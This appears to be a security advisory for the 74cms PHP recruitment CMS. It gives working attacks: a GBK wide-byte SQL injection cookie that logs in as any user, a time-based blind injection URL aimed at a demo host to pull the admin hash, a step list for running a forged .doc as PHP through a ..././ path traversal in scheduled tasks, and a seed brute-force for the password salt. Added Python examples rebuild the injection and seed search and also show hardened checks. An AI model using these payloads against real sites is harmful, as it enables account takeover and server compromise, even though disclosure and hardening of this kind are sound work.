0x1 Arbitrary user login
0x2 Blind injection
0x3 Shell via the admin backend
0x4 Random function problems
Detailed description:
0x1 Arbitrary user login
user/login.php:

elseif (empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype']) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
{
    // check_cookie() only asks whether SOME row matches username/password;
    // the uid that actually gets logged in is taken from the cookie as-is
    if (check_cookie($_COOKIE['QS']['username'], $_COOKIE['QS']['password']))
    {
        update_user_info($_COOKIE['QS']['uid'], false, false);
        header("Location:" . get_member_url($_SESSION['utype']));
    }
    else
    {
        unset($_SESSION['uid'], $_SESSION['username'], $_SESSION['utype'], $_SESSION['uqqid'], $_SESSION['activate_username'], $_SESSION['activate_email'], $_SESSION["openid"]);
        setcookie("QS[uid]", "", time() - 3600, $QS_cookiepath, $QS_cookiedomain);
        setcookie("QS[username]", "", time() - 3600, $QS_cookiepath, $QS_cookiedomain);
        setcookie("QS[password]", "", time() - 3600, $QS_cookiepath, $QS_cookiedomain);
        setcookie("QS[utype]", "", time() - 3600, $QS_cookiepath, $QS_cookiedomain);
        header("Location:" . url_rewrite('QS_login'));
    }
}
 
include/fun_user.php:

// Checks the COOKIE: both values come straight from $_COOKIE and are
// interpolated into the SQL string, so the check is injectable
function check_cookie($name, $pwd)
{
    global $db;
    $row = $db->getone("SELECT count(*) AS num FROM " . table('members') . " WHERE username = '{$name}' AND password = '{$pwd}'");
    if ($row['num'] > 0)
    {
        return true;
    } else {
        return false;
    }
}
 
Construct the cookie as follows:

QS[uid]       2
QS[utype]     1
QS[password]  111111111111111111111
QS[username]  %bf%27 or 1=1%23

uid is the ID of the user to impersonate, utype is that user's type, and the password value is arbitrary. The %bf byte in the username swallows the backslash that escaping places before the quote (the site runs in GBK), so the WHERE clause becomes username = '縗' or 1=1#..., count(*) is greater than zero, and the uid from the cookie is logged in. Note that check_cookie() never ties the uid to the row it matched: the uid is whatever the cookie says.
 
 
0x2 Blind injection
http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23

Both of the above are wide-byte (GBK) injections: %bf followed by the escaped quote is read as one two-byte character, and the quote survives. This one is time-based: 0x61646D696E is "admin", so the response stalls only when the first admin_name is admin, and the same if/benchmark pattern can walk the admin password hash one character at a time. A benchmark count of 1000000000 ties the database up for a very long time; a smaller count (or sleep()) gives a usable timing signal with far less load. If you can extract the admin password this way, crack the double md5 (salted with $QS_pwdhash, see 0x4) and guess the backend path, continue with the following.
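The two pieces below are an added example, not 74cms code: a Python rebuild of what the check_cookie() query looks like once the cookie from 0x1 passes through backslash escaping and is read as GBK (the %bf')/**/ prefix in 0x2 relies on the same effect), beside a hardened version of the login step. The escaping layer is assumed to behave like PHP addslashes(), the members table and hashes are constructed, and SQLite stands in for MySQL, so the '#'-commented string is only built and shown, not executed.

```python
import sqlite3
from urllib.parse import unquote_to_bytes

# Constructed stand-in for qs_members (uid 1 = admin, uid 2 = alice);
# the password column holds made-up hashes.
MEMBERS = [
    (1, "admin", "1d3ee9d1b9d0e5f3a7c2b4a6e8f0c1d2", 1),
    (2, "alice", "7d793037a0760186574b0282f2f435e7", 1),
]

# The cookie value from the advisory, still URL-encoded.
PAGE_USERNAME = "%bf%27 or 1=1%23"


def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def check_cookie_sql(name: bytes, pwd: bytes) -> str:
    """The string check_cookie() builds after escaping, decoded as GBK the way a
    GBK-charset MySQL connection parses it. 0xBF 0x5C is one GBK character, so
    the backslash disappears into it and the quote that follows is live."""
    sql = (b"SELECT count(*) AS num FROM qs_members WHERE username = '"
           + addslashes(name) + b"' AND password = '" + addslashes(pwd) + b"'")
    return sql.decode("gbk", errors="replace")


def injected_sql() -> str:
    """Query produced by the exact cookie the advisory uses."""
    return check_cookie_sql(unquote_to_bytes(PAGE_USERNAME), b"111111111111111111111")


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE qs_members (uid INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, utype INTEGER)")
    conn.executemany("INSERT INTO qs_members VALUES (?, ?, ?, ?)", MEMBERS)
    return conn


def login_uid_as_on_page(conn, cookie: dict):
    """Mirrors user/login.php: if ANY row matches username/password, log in the uid
    from the cookie. A bound query is used only because SQLite cannot run the
    MySQL '#' comment; the uid handling is the point."""
    n = conn.execute("SELECT count(*) FROM qs_members WHERE username = ? AND password = ?",
                     (cookie["username"], cookie["password"])).fetchone()[0]
    return int(cookie["uid"]) if n > 0 else None


def login_uid_hardened(conn, cookie: dict):
    """Bound parameters (no string building), and the uid comes from the matched
    row, never from the cookie."""
    row = conn.execute("SELECT uid FROM qs_members WHERE username = ? AND password = ?",
                       (cookie["username"], cookie["password"])).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(injected_sql())
    conn = setup_db()
    # alice's real credentials, but uid set to admin's
    alice = {"uid": "1", "username": "alice", "password": MEMBERS[1][2]}
    print(login_uid_as_on_page(conn, alice), login_uid_hardened(conn, alice))
```

Binding parameters alone would not close 0x1: with her own valid credentials a low-privilege user could still set QS[uid] to any value, which is why the hardened version also takes the uid from the row it matched.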
 
 
 
0x3 Shell via the admin backend
1. Disable the CSRF protection function first.
2. In the HR toolbox, add a forged .doc whose content is <?php phpinfo(); ?> and note the path it is stored under: data/hrtools/2012/06/1339941553308.doc
3. In Tools > Scheduled tasks, add a task and enter ..././data/hrtools/2012/06/1339941553308.doc as the script path.
4. Run the task: the "document" is included and executes as PHP.
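An added example, not 74cms code, of the check the scheduler step above is missing: resolve the user-supplied script path and refuse anything that does not stay inside the task directory. The page does not show the scheduler's own code, so the task directory is an assumption, and the single-pass "../" strip is included only to show why a denylist of that kind is not a fix: applied to the advisory's ..././ path it yields a plain ../ traversal.

```python
import posixpath

# Assumed location of the scheduler's script directory (not taken from 74cms).
TASK_DIR = "/var/www/74cms/include/task"

# The script path used in the advisory, verbatim.
PAGE_PATH = "..././data/hrtools/2012/06/1339941553308.doc"


def strip_dotdot_once(path: str) -> str:
    """A denylist 'fix' that does not work: remove '../' once. '..././' collapses
    to '../' after the removal, so the traversal is created by the filter."""
    return path.replace("../", "")


def resolve_task_script(user_path: str, base: str = TASK_DIR):
    """Containment check: join, normalise, and require the result to remain under
    base and to be a .php file. Returns the resolved path or None.
    Pure string normalisation is used here so the example runs offline; on a
    real filesystem use os.path.realpath() so symlinks cannot point outside."""
    full = posixpath.normpath(posixpath.join(base, user_path))
    if posixpath.commonpath([base, full]) != base:
        return None
    if not full.endswith(".php"):
        return None
    return full


if __name__ == "__main__":
    for candidate in (PAGE_PATH, strip_dotdot_once(PAGE_PATH), "cleanup.php",
                      "../../../data/hrtools/evil.php"):
        print(f"{candidate!r:55} -> {resolve_task_script(candidate)}")
```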
 
 
 
0x4 Random function problems (almost negligible, purely personal speculation)
In admin_common.fun.inc.php, $QS_pwdhash is assigned during installation. If you can guess it, you no longer need to crack the double md5.
This $QS_pwdhash is generated by randstr():

function randstr($length = 6)
{
    $hash  = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';
    $max   = strlen($chars) - 1;
    // the seed is only the microsecond part of the current time: at most 1,000,000 distinct seeds
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

It generates a 6-character string. Because mt_srand() is seeded only from the microsecond value, the same seed always yields the same string, so the salt can be recovered in at most 1,000,000 attempts (painful, but finite).
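The seed search described above, as an added example rather than anything from 74cms: randstr() is re-implemented with its mt_srand() seed made explicit, on top of a from-scratch MT19937 with the range mapping PHP 7.1 and later use for mt_rand(min, max). PHP 5, current when this advisory was written, used a slightly different twist and scaled (mt_rand() >> 1) as a float, so the generator must be checked against the target's PHP version before trusting a recovered seed. The character set is the one reconstructed from randstr() above, and the observed string in the demo is produced from a chosen seed rather than taken from a real install.

```python
# Character set of randstr() as reconstructed on this page (assumed to match 74cms).
CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-="


class MT19937:
    """Standard Mersenne Twister, seeded like init_genrand() / PHP php_mt_initialize()."""
    N, M = 624, 397

    def __init__(self, seed: int):
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N  # force a twist on first use

    def _twist(self):
        mt = self.mt
        for i in range(self.N):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % self.N] & 0x7FFFFFFF)
            mt[i] = mt[(i + self.M) % self.N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def next_u32(self) -> int:
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def php_mt_rand_range(gen: MT19937, lo: int, hi: int) -> int:
    """mt_rand(lo, hi) as in PHP >= 7.1: rejection sampling on the full 32-bit word."""
    umax = hi - lo
    r = gen.next_u32()
    if umax == 0xFFFFFFFF:
        return r + lo
    umax += 1
    if umax & (umax - 1):  # not a power of two: drop values that would bias the modulus
        limit = 0xFFFFFFFF - (0xFFFFFFFF % umax) - 1
        while r > limit:
            r = gen.next_u32()
    return (r % umax) + lo


def randstr(seed: int, length: int = 6) -> str:
    """randstr() with mt_srand(seed) made explicit; seed = (double)microtime()*1000000."""
    gen = MT19937(seed)
    return "".join(CHARS[php_mt_rand_range(gen, 0, len(CHARS) - 1)] for _ in range(length))


def recover_seed(observed: str, seeds=range(1_000_000)):
    """Brute-force the microsecond seed space (0..999999) until the string repeats.
    Pure Python manages roughly a thousand seeds per second, so a full sweep takes
    minutes; the same loop in C, or a table built once, is the practical form."""
    for s in seeds:
        if randstr(s, len(observed)) == observed:
            return s
    return None


if __name__ == "__main__":
    salt = randstr(123456)  # constructed "observed" salt from a chosen seed
    print(salt, recover_seed(salt, range(123_000, 124_000)))
```

If the salt itself is never exposed, the same loop still applies: for each candidate seed, compute md5(md5(password) . candidate_salt) for a password guess and compare against the stored hash, which turns the double md5 into a 1,000,000-way salt search per guess.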
Proof of vulnerability:
 
 
 
 
Solution:
Do it yourself ~
 
Author yy520